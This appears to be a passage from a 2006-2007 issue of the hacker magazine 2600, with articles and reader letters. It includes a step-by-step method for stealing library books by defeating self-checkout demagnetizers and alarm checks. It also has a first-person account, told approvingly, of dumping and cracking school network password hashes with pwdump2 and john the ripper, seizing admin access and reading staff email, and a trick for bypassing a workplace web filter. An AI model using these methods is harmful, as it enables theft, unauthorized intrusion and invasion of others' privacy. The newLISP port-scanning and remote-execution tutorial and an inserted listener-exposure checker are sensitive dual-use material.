The machines in question, which I assume are in all large libraries, are in use both at my university and in my city library. Walking up to the checkout with book in hand, there will be a huge line of people waiting for the librarian/monkey-drone to scan out their books. To the right will be six of these machines that most people are too afraid to try and figure out. (Every time I go to the library there is at least one person trying to do it and failing miserably). Anyways, the process is simple. You put in your library card and then enter the last four digits of the telephone number associated with the card. You are then presented with a screen prompting you to scan each book. Basically you lay the book down on the tabletop of the machine and, sliding it forward, line up the bar code reader with the bar code affixed to the front cover of the book. If it scans correctly there is a clunking sound (it sounds as if it is a physical motor) and the book is demagnetized and recorded into the network as "checked out." A receipt is generated at the end of the session and you are free to leave. Of course, the hacker in us immediately wonders: maybe there could be a way to trick the machine into demagnetizing a book for us without having it be linked to our card to give ourselves an unlimited amount of time to use and peruse any book we wished? But of course, one just needs to simply take two books, place the book they wish to own down on the tabletop, and then put the second book on top of it. As the machine scans the top book as checked out, it demagnetizes the bottom book. The book you can now take past the alarm sensors is not checked out at all whereas the one that is checked out is still magnetized. Now obviously there is a little logistical problem here, for if you walked out the door the alarm would ring. But it's not too hard to figure out a solution to this one. If we watch the security guard who deals with the alarm all day, we notice that upon alarm (it is tripped at my library at least ten times an hour), he will take the person's check out slip and compare it with the books he has in his hands. So if we put our demagnetized book in a backpack and walked out with our check out slip and the checked out copy of Charlotte's Web, the alarm would sound and he would ask us to pass it around the sensors and have us walk through again to see if we could go through without setting it off again. Of course we could do so without problem and with a little friendly banter, be right on our merry way. For larger scale operations (a book ratio of 1:1 is necessary), this could be worked with an accomplice who takes all the demagnetized ones out while the other sets the alarm off with the checked out ones.
Now why would anyone do this besides having a zealous and misguided love for books? Well if you go and learn a little about book collecting you will find that your library actually has a number of rare books, or first editions, that they have amassed over the years, and which hold a considerable value. Even if we stick to modern hard covers and check out abebooks.com for the three volumes of Dante's Inferno, Purgatory, and Paradise translated by Allen Mandelbaum, we find a minimum price of $65 and a top of $175 for each book. Of course, more digging might turn up some higher values. All this highlights is that the motivation for book stealing could be, at core, economic, and we all know we live in an era where any infamy perpetrated in the pursuit of wealth can (somehow) find justification.
Now what interests me most about this whole thing is not that I can steal books (which would be pointless because I can simply borrow them), but that for years stealing books from the library must have been fairly easy. Before there were alarms and the like, nothing was stopping you. And yet here in the present, one technology in the form of self-checkout machines can be manipulated to defeat another technology in the form of security sensors - which brings us back to the same situation as before! Perhaps no matter how many layers of technology we pile atop our daily lives, at the end of the day our freedom is ours to make, and that is the human choice. Keep thinking!
fun
L
by Cronid3
cronid3@gmail.com

My school uses a Novell/NetWare network and manages its users with GroupWise. I'd been trying for the past two years to somehow attain network passes. However Novell's password database is quite secure. The main user/pass database on the server is encrypted with some ridiculous RSA encryption and is nearly impossible to get to. However, when users login, their passwords are stored in XP's SAM files. That sounds like a good target. As many of you probably know, there are several programs out there for "extracting" this data. One of them is the ever-infamous pwdump. It has several versions (pwdump, pwdump2... all the way through pwdump6). All of these variations use the DLL-injection method (samdump.dll) under the lsass.exe process. Unfortunately, many of these programs no longer work (and usually crash the machine) because of the various patches and service packs. Even more so, our admins thought they were secure with SYSKEY on the machines, which encrypts the hashes. A tricked-out version of pwdump2 (originally written to run under NT4) that I found seemed to do the trick.
You can locate this version of pwdump2 and several others at http://www.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003.

Run pwdump2 through the command prompt and voila! The usernames and NTLM hashes for all the users that have ever logged on to the machine through Novell! (Mind you, our school ghosts all the machines twice a year, so it's only the users that have logged on since the last ghosting). Running these passes through l0pht or another pass-cracking program (I like john the ripper) will give you most of the passes within a few minutes. Some of the "tougher" ones will take a few hours. Inevitably our sysadmins have logged onto 90 percent of our school's machines themselves, so guess who runs our network now? NetWare administrator, GroupWise managers, grading programs, all at my fingertips. However, not being a "cracker" (aka the bad rep that all "hackers" are given), I have not abused this privilege, although the amount of power I have is truly amazing having full read/write access to our file server, our web server, and both our backup servers.
After several days of exploring, I realized that it must have slipped my mind that I had access to all staff email. Why not take a peek, right? As it turns out, perhaps some things are best left undiscovered. Apparently, as Moebius Strip also discovered in his article in 23:2, interoffice romances do occur quite often. As I'm sure you can imagine, all of this new power I had in my hands was such an insane rush and it was quite hard to keep myself from sharing it with everyone I knew. I knew I had to though because as I'd learned from previous ventures, however untraceable you can make yourself or how perfectly you execute your plan, it's always the people you tell that get you caught.

Interestingly enough, one of our sysadmins seems to condemn the use of Firefox (or any alternative browser for that matter), which is odd because I've met many die-hards for Firefox, Opera, or whatever other browser, but I've never met a die-hard IE fan. Guess there's a first for everything. As an April Fool's joke, I made a little addition to the login scripts that removes IE from the NDS "Novell-Delivered Applications" window and adds Firefox to it instead. Both of our admins, who are less-than-intelligent, still haven't figured it out.
Another popular thing that kids fool around with on our network is
nwsend, which is like instant messaging through Novell on the intranet.
Included by Novell by default, our admins have disabled it. But you can
download it free from download.com, etc. I'd think that if they'd just
let the kids have it that the excitement would blow over after about a
week and no one would care about it much anymore. After all, through the
program you can block messages from users, so teachers, etc., can block
everyone and not be harassed. I figured I would test this theory out, so
I re-enabled nwsend through Novell and, to say the least, my theory
wasn't quite right. Maybe it didn't have enough time to mature, but I
quite obviously failed to account for kids that have "skills," prime
example being script-kiddies that run a program that floods the system
with messages and crashes the network. Our admins ferociously locked
down the whole network and scurried about trying to figure out who
re-enabled nwsend and looked through log files to see who maybe logged
in or somehow got their privileges raised. Of course they found nothing.
The only users that had logged in with admin privileges had been
themselves, so they immediately began accusing each other and arguing,
foul language being the primary vocabulary. I love when dumb admins make
themselves look even dumber.
On a final note, don't try these methods if you have a somewhat
competent sysadmin (hahaha) who reviews the logs regularly. However, if
your case is like mine.... What's that I smell? Could it be some badass
pranking? I think it is.
Page 30 2600 Magazine

How to Build a Book Safe
by c-dollar
We all love 2600 for its highfalutin articles on port knocking, Caller
ID spoofing, Walmart self checkout hacks, etc., but, sometimes we lose
sight of the obvious stuff. Sooner or later, the North Koreans or
Iranians are going to bomb us. When that happens, how are you going to
pay for doughnuts and beer from the 7-11? It'd be nice to assume you
have money in your wallet or shoe, but that may not be the case. Where
are you going to hide your emergency cash? In a bible? In a shoe? Well,
that's up to you; mine will be safely tucked in a copy of Jane Eyre,
unlikely to be discovered by the invading ground troops.

For hundreds of years, if not thousands, book safes have been used as a
way to conceal things. Even though you may not be captive in a state pen
awaiting a file stored in a book (or a cake), a book safe may be for
you. It's unlikely that a cursory search of your dwelling will turn up
something hidden in a book.
Making one is simple and requires less than an afternoon. First things
first - acquire the necessary materials:

1 book (preferably hardcover and larger than six by nine inches)
1 bottle of Elmer's White Glue
1 cheap one inch foam paint brush (or if you're really cheap, a piece of
  a t-shirt or sock)
1 box cutter
1 Dremel rotary tool (or similar - optional)
1 ruler
1 desire to hide something in plain sight
Regarding the materials, books are easy to come by. Please don't steal a
book from the library; libraries are awesome. Go to a garage sale and
grab any book of the appropriate size. The bigger the better, and the
more obtuse the subject matter the better. Don't pay more than a dollar
for the book. Bonus points if you choose a crappy book packed with
right-wing politics.

Open the book. Skip the first 15 pages or so. Use your ruler to draw a
rectangle you're going to cut out. Keep the rectangle at least two
inches from each side. My first attempt failed due to my attempt to
hollow out too much of the book. Now I know you all have Dremels that
you used to cut vanity windows on your Lian Li cases, but they're not a
necessity. A box cutter or X-Acto knife will work fine.

In any case, choose your weapon and begin cutting on the rectangle you
drew. If you use a Dremel, be very careful not to set the book on fire -
aim to cut around 20 pages at a time. Hold the Dremel in paper for more
than 30 seconds and you've got a fire on your hands.
Once you've completed the first rectangle, pull out the section of pages
you've cut. If you're having trouble pulling out the pages, use the box
cutter or X-Acto knife to trim the parts you missed. Pay special
attention to the outer edge of the book; you really don't want to tear
those pages or the end product won't look convincing. Repeat until
you've hollowed out enough of the book to hold your secret. Patience is
a virtue; if you move too fast, you're going to mess up the pages and
your safe won't be so stealth.
Once you've hollowed out enough of the book, empty any paper shards into
the trash. Close the book and squirt your white glue into a container.
Dip your brush in the glue and paint the edges of the exposed pages. Lay
the book flat, put something heavy on it, and let it sit for a few
hours. Once it's dry, open the cover and trim the edges of the opening
using the box cutter or X-Acto knife. Once you have smooth edges, use
your paint brush and spread more white glue on the inside of the secret
compartment. An hour later, you have your book safe! Now, stuff it with
cash, important papers, Dell coupons, or whatever. Rest assured, it will
take invading armies quite awhile to find your stash!

Winter 2006-2007 Page 31
by axOn
newLISP (www.newlisp.org) is a relative newcomer to the interpreted
language arena in terms of popularity. While it had its humble
beginnings back in 1991 when Lutz Mueller started working on it, only in
the last four years has development been consistently active.

newLISP is everything that old-school LISP languages are, with a lot of
modern features. First off, it's a scripting language that's extremely
fast. It has networking ability that's powerful enough to write TCP or
UDP client or server applications. Then, to top that off, it has a
command called net-eval which makes newLISP stand out from the crowd by
giving it the unique ability to easily distribute tasks to other nodes
over a network connection.

Binaries (under 200 kilobytes) are available for Windows, BSD, Linux,
Mac OS X, Solaris, and a host of other platforms. It is released under
the GPL. Performance is also second to none. newLISP has been topping
the charts on script interpreter benchmarks in several categories thanks
to its small size (under 200 kilobytes) and efficient C code. It outruns
php, perl, and even ruby.
newLISP also has some other tricks up its sleeve that make it an
excellent system administration scripting language. It has decent
filesystem support so it can see if files or directories exist and
determine if a file's permissions are acceptable for reading or writing.
It has very powerful text processing ability using PCRE (Perl Compatible
Regular Expressions). Finally, it's also worth mentioning that newLISP
can easily import whole functions from dynamic libraries such as
libmysqlclient (instant MySQL access from within newLISP!), tcl/tk (for
creating graphical applications in newLISP), and zlib (for compression
and decompression) just to name a few. This makes newLISP one of the
most robust and flexible languages around.

As you can tell, newLISP is a formidable choice for hackers, geeks,
network admins, or security professionals wishing to create scripted
programs to do network operations or distributed computing with minimal
effort.

I am lucky to have been able to work directly with Lutz, the founder and
creator of newLISP. I got a few direct lessons from him and, from there,
started tinkering with it on my own. With that, the first thing I did
was create a makeshift port scanner. I learn easiest by example, so here
is what I came up with.

[port.lsp]
#!/usr/bin/newlisp
; main-args holds: interpreter, script name, host, begin-port, end-port
(set 'params (main-args))
(if (< (length params) 5)
  (begin
    (println "USAGE: port.lsp host begin-port end-port")
    (exit)))
(set 'host (nth 2 params))
(set 'bport (int (nth 3 params)))
(set 'eport (int (nth 4 params)))
(for (port bport eport)
  (begin
    ; net-connect returns a socket handle on success, nil on failure
    (set 'socket (net-connect host port))
    (if socket
      (begin
        (println port " open")
        (net-close socket)))))  ; release the handle before the next port
(exit)

The first part simply assigns the command line arguments into a list
called params, then makes sure that four parameters were given (program
name, host, begin port, and ending port). If not, it displays a usage
tip before exiting.

The second part assigns elements of the list to appropriate variables,
then uses a for loop to iterate through the ports, displaying the port
numbers that are open. Note that on machines with packet filters that
"drop" packets, this port scan will take a very long time. nmap is a
much more robust port scanner, however this little script demonstrates
the power of newLISP's network commands. We'll run this as a test just
for fun:

./port.lsp 192.168.0.105 1 200
21 open
22 open
23 open
25 open
79 open
111 open
Now, let's look into distributed computing, shall we? The core command
behind newLISP's distributed computing power - called "net-eval" -
operates on a list of lists (similar to a three dimensional array). The
innermost list is a list of host, port, and a string representing the
command(s) you wish to run on the remote node. The outermost list can
contain as many host-port-command lists as your heart desires, allowing
you to run many distributed processes at once and get the results back
all at the same time. Then, outside those lists is a timeout in
milliseconds. If a result isn't returned in the timeout period, the
operation returns "nil" (that is, false). To clarify, net-eval syntax is
as follows:

(net-eval (list (list "host" port-number command-string)) timeout)
On each remote node, you must have a newLISP listener, which is simply
started by running "newlisp -c -d {port number}" from the command line.
On UNIX environments, you may put an ampersand (&) at the end to launch
it in the background, or you may even wish to use "set NOHUP" and log
off to leave it running in the background indefinitely. In my example, I
went to my Solaris box and launched it, listening on port 31337 as
follows:

$ newlisp -c -d 31337 &
2672
$

I also launched newLISP listeners on various other machines on my home
network, including a few OpenBSD machines and my wife's MUD/BBS server
running Windows Server 2003 with the "Services for UNIX" tools
installed.
Now, care must be taken. It is a bad idea to have a newLISP listener
running on a public IP address, because commands like process or exec
can launch shell processes on the newLISP node, which is just as good as
giving away an unprotected shell account on your network. I advise using
newLISP listener nodes only behind a NAT or firewall, or on a segregated
network.
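
One way to check a Linux node for the exposure described above, as an added example that is not part of the original article: the Python below parses `ss -ltnp` output and flags any newLISP listener bound to something other than loopback, noting whether the address is a wildcard, a private range, or public. The sample lines are constructed, the function names are this example's own, and it assumes the `ss` column layout shown.

```python
import ipaddress
import re

# Constructed sample of `ss -H -ltnp` output (Linux iproute2, run as root so
# the process column is populated). Not captured from a real host;
# 203.0.113.7 is a documentation address standing in for a public IP.
SAMPLE_SS_OUTPUT = """\
LISTEN 0 128 0.0.0.0:31337 0.0.0.0:* users:(("newlisp",pid=2672,fd=3))
LISTEN 0 128 127.0.0.1:4711 0.0.0.0:* users:(("newlisp",pid=2701,fd=3))
LISTEN 0 128 [::]:22 [::]:* users:(("sshd",pid=811,fd=4))
LISTEN 0 128 192.168.0.55:31338 0.0.0.0:* users:(("newlisp",pid=2710,fd=3))
LISTEN 0 128 [::1]:31339 [::]:* users:(("newlisp",pid=2733,fd=3))
LISTEN 0 128 *:8080 *:* users:(("newlisp",pid=2750,fd=3))
LISTEN 0 128 203.0.113.7:31340 0.0.0.0:* users:(("newlisp",pid=2761,fd=3))
"""

# One ("name",pid=N entry per process that holds the socket.
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')

# Ranges that are normally only reachable from inside a NAT or local segment.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "fc00::/7", "fe80::/10")]


def split_endpoint(endpoint):
    """Split ss's 'addr:port' into (addr, port); handles [v6]:port, *:port, addr%iface."""
    addr, _, port = endpoint.rpartition(":")
    return addr.strip("[]").split("%")[0], int(port)


def classify(addr):
    """Return 'loopback', 'all-interfaces', 'private', 'public' or 'unknown'."""
    if addr == "*":
        return "all-interfaces"
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return "unknown"  # unparseable: report it so a human reviews it
    if ip.is_loopback:
        return "loopback"
    if ip.is_unspecified:  # 0.0.0.0 or ::
        return "all-interfaces"
    if any(ip in net for net in PRIVATE_NETS):
        return "private"
    return "public"


def exposed_listeners(ss_output, process_name="newlisp"):
    """List listening sockets owned by process_name that are not loopback-only."""
    findings = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue  # header line, blank line, or non-listening socket
        pids = [int(pid) for name, pid in PROC_RE.findall(line)
                if name == process_name]
        if not pids:
            continue
        addr, port = split_endpoint(fields[3])
        scope = classify(addr)
        if scope != "loopback":
            findings.append({"pid": pids[0], "addr": addr,
                             "port": port, "scope": scope})
    return findings


if __name__ == "__main__":
    for f in exposed_listeners(SAMPLE_SS_OUTPUT):
        print("pid %(pid)d listens on %(addr)s:%(port)d (%(scope)s)" % f)
```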
Let's run a test script, shall we? In LISP, boolean and math operations
are always performed by placing the operator first, followed by the
symbols to apply it to. In addition, the symbols are numbers, but they
could easily be strings or lists with some operations. Adding 1+2 in
LISP is as simple as (+ 1 2). I will start by running a quick addition
operation on one remote node with a 3000ms (3 second) timeout.

[net-eval-test.lsp]
#!/usr/bin/newlisp
; the string is evaluated on the remote node, not locally
(set 'evalstring "(+ 1 2)")
(println (net-eval (list (list "192.168.0.55" 31337 evalstring)) 3000))
(exit)

When we run it, we get the answer to this mind-boggling math problem:

$ ./net-eval-test.lsp
(3)
Now, to expand this even more, I have added three other nodes into the
mix, which shows more clearly how the nested list syntax of net-eval
works, and I'll demonstrate remote command execution at the same time,
using the "exec" command. Notice how the quotes around the command to be
run are escaped with backslashes. This is needed to keep from confusing
the interpreter. To put quotes inside a quoted string, you need to
escape them. This is almost universal to all programming languages. On
UNIX-like platforms, uname is used to get information about the
operating system and architecture. uname -s -n -m will list the OS
that's running, the hostname, and the machine architecture.

[uname.lsp]
#!/usr/bin/newlisp
; inner quotes are backslash-escaped so they survive inside the string
(set 'evalstring "(exec \"uname -s -n -m\")")
(println (net-eval (list
    (list "localhost" 31337 evalstring)
    (list "192.168.0.55" 31337 evalstring)
    (list "192.168.0.102" 31337 evalstring)
    (list "192.168.0.127" 31337 evalstring)
  ) 3000))
(exit)

The result is a newLISP list of strings, containing the results of
running the command:

$ ./uname.lsp
(("SunOS sparky sun4u") ("OpenBSD compy386 i386") ("OpenBSD bouncer sparc")
("Windows mudbbs x86"))
The online documentation for newLISP is very extensive and features a
few rather advanced demonstration scripts, including a working web
server written entirely in newLISP. While learning a new programming
language is never easy, newLISP is more than mature enough in both
implementation and documentation to make it a pretty easy language to
add to your list.

Links

http://www.newlisp.org - NewLISP Website, full of demonstration newLISP
programs, documentation, binaries for many platforms, and newLISP source
code.

http://newlisper.blogspot.com - NewLISPer is a journal, or blog, written
by a guy who was just learning newLISP. It's turned into a bunch of
newLISP tutorials with some philosophy tossed in as well.

http://www.nodep.nl/newlisp - Norman's code snippets is a website full
of newLISP programs and snippets for Linux (not tested on other
platforms). There are a lot of really interesting applications and
widgets available to download.
Lonversa
Suggestion
Dear 2600:
I've just discovered Revision3 - the online TV station - and I thought
why don't you guys at 2600 do Off The Hook as a TV show as well? It
would just be you guys in the studio talking but you could then edit the
video afterwards and throw in screenshots, links, video clips, or
something else about the topics you are talking about. I think it would
work quite well and I'm sure most of us 2600 readers would love it.
aft
It sounds like a great idea but the problem is that all of these
endeavors take a great deal of work and coordination and our time is
already pretty stretched to the max. If it's possible to pull something
like this off we'll certainly give it a try.
Reaction
Dear 2600:
I've been an avid reader for several years now but some things in 2600
are starting to make me lose interest. For example, every commentary I
read contains phrases like "George Bush is spying on us" and "George
Bush's domestic surveillance program." I am so sick and tired of people
repeating talking points from the Democratic Party word for word in
their commentaries regarding computer security. Can we stop acting like
morons and actually examine these programs without whining about George
Bush? Every time I read something from one of your commentators I feel
like they haven't even done a shred of research. They simply copy/paste
crap from the media concerning the NSA. Last time I checked this
magazine was about independent thought, not ignorant political rants. If
we want to talk about national security, why doesn't someone mention how
George Bush hasn't sealed our borders even after 3,000 people were
killed on 9/11? Why don't we discuss real issues that matter instead of
constantly whining about the NSA and the "evil" Bush administration?
It's getting redundant and quite boring to read in every issue. Can't we
be more informed? Don't we have the Internet and alternative forms of
media to find the truth and not just repeat what people with an agenda
tell us? I wouldn't even mind someone complaining about the NSA if they
actually took five seconds to get their facts even remotely correct.
This program I read about covers people in America who make a phone call
to al-Qaeda overseas. It's that simple, yet we all act like George Bush
climbed into our telephones. A well-reasoned argument against the NSA
wiretapping would be something interesting to read. I haven't seen
anything that resembles a "well reasoned" argument from any article for
months now.
comfreak

Believe it or not, this is an issue that affects everyone, regardless of
political affiliation. And the wiretapping issue is nowhere near as
simple as you make it out to be. We're not about to tell people to avoid
a subject that our particular community understands better than most
insofar as the threats to privacy and the implications of information
gathering. "Independent thought" is also critical thought and never has
there been a time where that has been more in need. As for a "well
reasoned" argument, let's defer to our readers.

Dear 2600:
In 23:3 page 37, R wrote about how it's difficult to get friends to care
about the NSA's call record database. They give the standard "I'm not a
terrorist, so it won't hurt me" argument. We know why surveillance like
this is a bad idea but sometimes it can be helpful to try to put things
in a way that people like that can understand.

The NSA's database is all about datamining and finding connections where
they may not have been found in the past. The problem with that is that
they'll also find connections that don't exist. R, tell your friends to
think about this scenario: you call five friends, and each of those five
friends happens to have gotten a call from a friend in a sensitive
political region. The feds have already picked your friends up, but they
also decide to pick you up too "just in case." Before you can say
"Surely there's been some mistake," you're tackled in your own home and
lying on the ground with a boot firmly planted on the back of your neck.

Of course, being Not A Terrorist, you have nothing to worry about.
Everything will get straightened out and they'll determine that you had
nothing to do with terrorism and release you. The problem is they can't
"unarrest" you. They won't tell your neighbors that it was all a
mistake. They won't make that dirty feeling go away, or the fear.

Maybe to avoid that kind of situation before it happens, you'll change
your behavior. You're not a terrorist, of course, but... maybe it'd be
prudent to stop talking to your friends in Baghdad just until things
calm down. Maybe you'll start being very careful
about who you call in case a spurious connection to terrorism is found.
That's what's called a "chilling effect" on free speech, and preventing
that is why the freedom of speech is the first amendment.

We 2600 readers know all this and have it distilled down to a few basic
axioms like "surveillance is bad," but every once in a while it can be
helpful to ground things in the concrete.
Lex
We couldn't have said it better. This kind of thing doesn't just affect
those of us who get falsely accused. We all feel it and that gets
manifested in how we behave: who we talk to, what websites we go to,
ways that we look at the people around us, etc. It's a sickness that has
to be recognized before we stand any chance of stopping it. We're
impressed with the number of people who get this. We can't allow
ourselves to be discouraged into thinking we're powerless to change the
direction we're heading in. Nor can we be convinced that this is not
something for us to be talking about. This should be a paramount issue
for freethinking people in any forum.
Dear 2600:
In response to the letter submitted by the former NSA employee, from my
experience not all of the "phobia" expressed by the 2600 society is
"hogwash." In particular, I would be concerned with the monitoring of
communications and other activities. As a former employee of a
background investigation company called ChoicePoint, I have personally
witnessed such activities. As well as other services, we performed
background "checks" for the FBI, CIA, and NBA (OK, maybe not the
latter). Just before I resigned, the CEO of ChoicePoint approached my
team and inquired how difficult it would be to not only monitor the
"activities" of someone - let's say an FBI applicant - for their six
month probation period, but to monitor the people with whom they
associated. To clarify, he wanted to monitor the subject's friends,
family, and acquaintances. His justification was "birds of a feather
flock together." So if your friend is engaged in criminal activities
then you, by association, would be flagged as well. I'll let you form
your own opinions regarding the moral issues involved, but apparently
the legal issues were not a concern to him. Our mission as developers,
handed down directly from him: "not to question why but just to do or
die." Hence my departure.
X! U304d
Dear 2600:
Had to write regarding the disgruntled Cox subscriber (second letter in
23:3). This individual promptly snivels about his privacy after stealing
a movie online. Lovely. What "privacy" were you hoping for? Wake up,
sheep! You volunteered to use a corporation's server (capitalism rules!)
to access the net. You volunteered to abide by their "terms of use"
agreement. You promptly broke the law. Now you're upset because they
monitored your downloads? You are the reason they monitor downloads. And
you give a nice little blurb - "the movie sucked." Well, that justifies
your actions. The movie sucked, so breaking the law and, more
importantly, willfully violating the terms of use - a clear cut breach
of contract - shouldn't apply to you. Golly, the injustice of it all!
All information should be free. Stealing creative works of art is not.
You seem to miss something here, so I'll repeat it: You volunteered to
use the company's portal to the Internet under their terms. Further,
"buying" a copy of a creative body of work is not ownership of the
copyright as you seem to think. It is buying a license to use - subject
to the agreed upon terms. Sharing is good, like you said. Sharing of
information, to be clear, is great, and I will vehemently stand up for
that. Do not believe that any ISPs are benign in their service. They are
justifiably concerned about being an unknowing partner in online crimes.
The push behind the monitoring is not moral. It is the team of flesh
eating barristers they hire to remain solvent and profitable.
Steve

Dear 2600:
This is in response to Beowulf's letter in 23:3 which was in regards to
my original letter in 23:1. First off, the site that I had found the
information on the CEH had a pricing of about $150 to take the exam. I
rounded up, and I do apologize. I also apologize for not being clear in
my letter about my situation. I am a college student. However, I attend
a school that does not offer campus dorms so I am forced to rent. I had
two jobs at the time because I needed to pay rent, electric, phone, and
all that fun stuff. I was going through a rough time then.

I was using the CEH as an example of my point that there are companies
that put things a little too highly priced for people who are in the
same financial situation as me to get started easily in this great
industry. But now that I actually think about that statement, I suppose
it is the same for any industry. I am also learning. I use the articles
from this fine publication to expand my knowledge and understanding of
Unix based operating systems. I am in the process of teaching myself
programming so that I may grasp a better understanding of the various
languages that are out there. However I have always been a fan of study
guides.

I see the various certification exams as important building blocks for
my future. To me it does not matter if an exam costs $50 or $350. I am
spending money to take these tests and I want to pass. So I read study
guides and I know that it is not the best way to learn new things. The
best way to learn is from experience. I can only gain so much from
creating my own study labs. I need experience in the field. And to my
understanding, certifications are a huge part of getting into that
field.

I have since become full-time at one of the two jobs I was working at
and I quit the other to give myself more time for other things such as
my girlfriend, friends, etc. I thank you, sir, for your advice and
kind words. It is hard to enjoy learning about how the government came
up with laws to stop monopolies back in the early 20th century. But I
only have four more months before I graduate with my associates, so I am
sticking with it. It's nice to know that people out there are concerned
about us college kids. I appreciate it and thank you again. I also say
thank you once more to the makers of this awesome magazine. You guys
seriously rock!
P3ngul n
Dear 2600:
I know this may seem a little late, but I've been meaning to write you a
letter and as I was rereading an old issue I thought the quote you
opened with in issue 22:2 seemed a bit misleading. This struck me as odd
since most of your issues open with a quotation having very much to do
with ethics. I wonder if that quote from Orwell, "Men are only as good
as their technical development allows them to be," might have been taken
out of context in a way. Did he not mean by "good" that they are merely
as technically "capable and productive" as their technical development
allows? Either way, that would make much more sense because technical
development has not at all seemed to improve the moral or ethical
character of mankind. And that brings me to the crux of my position
which I have wanted you to respond to for some time. The technical
capabilities of hacking computer technology may be amorally used for
good or evil, but the evil which you seem to often downplay can be of
devastating power and seems far more insidious as large bureaucracies
make use of technical capabilities to further their agenda. In regards
to that point about power I'll point out that as our lives become more
dependent upon computer technology a single person acting destructively
can cause far more damage. And the information, which the hacker credo
suggests should ever be free and available to all, might bring about
great devastation. I can think of a number of weapons technologies, for
instance, whose technical schematics ought to be hidden if not
destroyed. Of course, technical capability grows and, sooner or later,
these devastating technologies will become practically commonplace and,
inevitably, put to use. Men are indeed only as good as their technical
ability allows them to be. Now I realize that your staff has spent their
lives improving and believing in the neutrality of computer technology,
and I don't criticize that behavior simply to be mean, but how neutral
is it when an individual can obtain highly destructive information and
corporations use the ability to promote the highest level of ecological
consumption in the history of civilization? As much as the technology
might help one individual find some sort of zen happiness, how many
millions of others does it simply compel to shop? Are the benefits
brought about by easily accessed knowledge about, say, the environment,
offset by the environmental harm caused by the consumerism enabled at
the same time? That's to say nothing of the harm directly caused by the
manufacture of computer related equipment. And so this is my sincere and
honest critique which I challenge you to answer. My conclusion,
paradoxically, is that the greatest use of computer technology is
against itself, which I hope this message serves to do.
An Unapologetic Neo-luddite

Information will eventually fall into the wrong hands. This is as
inevitable as the sun rising. And it's certainly true that we've come to
rely on technology to such a great extent that it's easier than ever to
uncover vast amounts of personal data and create massive disruptions
with the same amount of malice that a few decades ago would have been
sufficient for a childish prank. While many feel the solution is to
forbid any sort of tampering which could result in something
catastrophic, that doesn't solve the bigger problem which is the overall
insecurity and lack of forethought in design. We can't blame this on the
computer technology itself but rather on how we choose to interrelate
with it. If we become enslaved to a technology, that's a human issue
that we need to address, not a technological one. If "highly destructive
information" is stored on computers, that doesn't make the computer any
less neutral. Rather, it speaks to our motives and failings as humans
and that's where the attention should be focused. Great good can come
from technology as well as great harm. It's our choice how we use it.
Eventually the system will fail for one reason or another. And we cannot
be so dependent on our technology that we don't have a plan for when
that happens. Weapons technology is something of a parallel as we see
such "advancements" now being made in other parts of the world,
something that would have been unthinkable not too long ago. The fact is
that the genie cannot be put back in the bottle once it's out and
eventually someone you're not comfortable with is going to gain access,
more times than not legitimately. Regardless of how you feel about
technology, pretending it's not there, hoping it will go away or
forbidding it from being tested and abused only puts off the inevitable.

Oppression
Dear 2600:
Check this out! We got peaceful hippies, right? No weapons whatsoever.
And what happens? The government comes after us with M16s! I am not much
of a writer, so I'll just give you this link:
http://www.youtube.com/watch?v=1hAx5GOI9mU. The movie is pretty much
self-explanatory. We need to get the word out. The more people know what
is happening, the better. This falls right along the lines of what 2600
stands for. Hackers stand for freedom. Every freedom enumerated in the
constitution including that of the right to assemble peacefully, as is
evidenced by HOPE and various peaceful protests carried out by its
members and readers. I myself am a reader. Yep, that's right, a hippie
that reads 2600. OK, I'm gonna stop right there before I go off on a
long rant. Enjoy the rampant display of violence towards peaceful
people, and the wonderful way in which we overcome the violence!
Kevin
With the exception of the cameraman's mutterings, this seems to be a
peaceful group confronted by a bunch of confused and overarmed cops.
Fortunately this episode ended well. One of the better things to come
out of our surveillance society is the ability to surveil right back in
the faces of those in power. When the authorities do something out of
line, you can count on someone in the vicinity to capture it all and
share it with the world. It doesn't change the fact that we lose more
privacy on a daily basis with all of the cameras, detectors, and
computer analysis targeting us all. But at least we're grabbing a little
bit of that to use for individual rights.
Dear 2600:
Good day all. I am writing this letter in regards to a telecommunications firm whose name will not be stated. I attempted to pay a bill online which was successful. I then called to speak to a "representative." They were not aware that the payment was made due to the fact the system had not alerted them. In order to restore services they demanded that I give them a daytime telephone number where I could be reached to get service again. The same person asked me for this three times despite being told repeatedly that this number was unavailable. Then I was transferred to the billing department. The payment was made electronically, which was unknown to the human being on the other phone. What in Ohm's law does my daytime phone number have to do with phone service?
I urge all of your readers to implement a voice over Internet solution and an analog line for contingency purposes. Down with Analog Service Providers! Keep the Technology Dump the Monopoly!
Serkit
This is a common ploy by many companies, telecommunications and otherwise. When they have you on the line, they will try almost anything to get more information out of you. Then they use this for marketing purposes, whether that means calling you to try and market some crap or simply selling your information to some other group of sleazebags. Congratulations on resisting their datamining attempt.

Dear 2600:
At my work area we use iMac computers. Which I dislike. I dislike these computers mostly for the OS. OS X does not make me happy. We also have to use a password to get past an overly-oppressive security system. The blocker we have is incredibly tight. It will not allow any access to forums of any sort, anything with "profanities" (some of the things considered profanities were words we were allowed to say in Grade 2), and all the other stuff bosses don't like. Early on we found out that the security seemed to work with Safari (OS X's main Internet browser) but not with Internet Explorer. We decided not to go into detail with this because we enjoyed the freedom. However, it was temporary. Eventually the network admins decided to make the Internet Explorer folder admin only and lock it off to us mere mortals. After about a month of suffering under Safari (which seems to be loaded with bugs as well as the blocker) we came upon a fun little way around Safari into Internet Explorer. It's very simple. Go to any application and click Help. It'll open up a nice little window with the OS X logo on the left. Under that will be a link to the Mac website. A simple click and you've got yourself a nice Internet Explorer window. This is a great trick to use if you've got a nasty blocker that only works with Safari, or Safari is asking you for a keychain password every couple of pages. Thanks to the writer of the Windows Media Player window trick for helping us get the idea!
DarkprO
Of course this little trick is very simple to fix or prevent from happening in the first place. But you have the right idea in resisting this level of control. It's not something specific to the Mac OS however. Blocking software works on nearly all platforms and the better they get the more frustrating it will become for those of us who just want to be left alone.

Dear 2600:
